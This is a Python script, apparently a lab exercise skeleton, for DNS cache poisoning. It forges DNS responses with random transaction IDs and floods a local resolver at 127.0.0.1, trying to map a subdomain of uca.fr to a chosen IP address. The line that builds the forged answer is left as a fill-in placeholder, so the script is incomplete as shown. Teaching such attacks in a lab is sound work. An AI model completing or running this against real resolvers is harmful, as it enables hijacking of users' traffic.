#!/usr/bin/python3 import multiprocessing import socket import random import time from dns import resolver HEADER_SIZE = 12 class RecordType: """DNS Record TYPE""" A = b"\x00\x01" NS = b"\x00\x02" CNAME = b"\x00\x05" CLASS_IN = b"\x00\x01" class Encoder: """Encode utilites function""" @staticmethod def encode_question_entry(name: bytes, type: bytes, qclass: bytes) -> bytes: """Encode entry question section""" return Encoder.encode_name(name) + type + qclass @staticmethod def encode_response_entry(name: bytes, type: bytes, qclass: bytes, ttl: int, rdata: bytes): """Encode entry response section""" return (name + type + qclass + ttl.to_bytes(length=4, byteorder="big") + len(rdata).to_bytes(length=2, byteorder="big") + rdata) @staticmethod def encode_name_pointer(offset_since_start: int): """Encode name pointer""" # Note: this wrongly assumes that offset <= 255 return bytes((0xC0, offset_since_start)) @staticmethod def encode_name(name: bytes) -> bytes: """a domain name represented as a sequence of labels, where each label consists of a length octet followed by that number of octets.""" # https://datatracker.ietf.org/doc/html/rfc1035#section-4.1.2 encoded = b"" for component in name.split(b'.'): # Chaque composant est précédé par sa longueur en octet encodé sur 1 octet encoded += len(component).to_bytes(length=1, signed=False) # Contenu encoded += component # Fin du nom encoded += b'\x00' return encoded @staticmethod def encode_header(response: bool, opcode: int, authoritative: bool, truncated: bool, rec_d: bool, rec_a: bool, rcode: int, questions: int, answers: int, authorities: int, additional: int): flags = [0, 0] if response: flags[0] |= 0x80 flags[0] |= (opcode & 0x0F) << 3 if authoritative: flags[0] |= 0x04 if truncated: flags[0] |= 0x02 if rec_d: flags[0] |= 0x01 if rec_a: flags[1] |= 0x80 flags[1] |= rcode & 0x0F # header = tid.to_bytes(length=2, byteorder="big") header = bytes(flags) header += questions.to_bytes(length=2, byteorder="big") header += answers.to_bytes(length=2, byteorder="big") header += authorities.to_bytes(length=2, byteorder="big") header += additional.to_bytes(length=2, byteorder="big") return header class DNSServer: """Represent a DNS Server""" def __init__(self, ip: str, port: int, query_port: int): self._ip: str = ip self._port: int = port self._query_port: int = query_port @property def ip(self) -> str: return self._ip @property def port(self) -> int: return self._port @property def query_port(self) -> int: return self._query_port class Request: def __init__(self, dns: DNSServer): self._dns: DNSServer = dns def post(self, pipe, spoofed_name_server: str, address: bytes): spoofed_name_server_encoded: bytes = spoofed_name_server.encode() sok = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) name_server_encoded: bytes = pipe.recv() while True: packet_body = Encoder.encode_header( True, 0, False, False, True, True, 0, 1, 2, 0, 0) packet_body += Encoder.encode_question_entry( name_server_encoded, RecordType.A, RecordType.CLASS_IN) packet_body += #à completer while not pipe.poll(): transaction_id = random.randbytes(2) sok.sendto(transaction_id + packet_body, (self._dns.ip, self._dns.query_port,)) name_server_encoded = pipe.recv() def get(self, pipe, name_server: str): resolve = resolver.Resolver() resolve.nameservers = [self._dns.ip] resolve.port = self._dns.port while True: pipe.send(name_server.encode()) time.sleep(1) try: res = resolve.resolve(name_server) print("Found", res.response.answer) except resolver.NXDOMAIN: print("Not found") except resolver.LifetimeTimeout: print("empty / timeout") except resolver.NoAnswer: print("No answer") dns = DNSServer(ip="127.0.0.1", port=7654, query_port=6969) req = Request(dns) cpt = 0 while True: new_address = bytes((37, 187, 116, 58)) domain = "uca.fr" spoofed_sub_domain = "random" spoofed_domain = spoofed_sub_domain + "." + domain parent, child = multiprocessing.Pipe() p = multiprocessing.Process(target=req.post, args=(child, spoofed_domain, new_address)) p.start() req.get(parent, domain) p.join()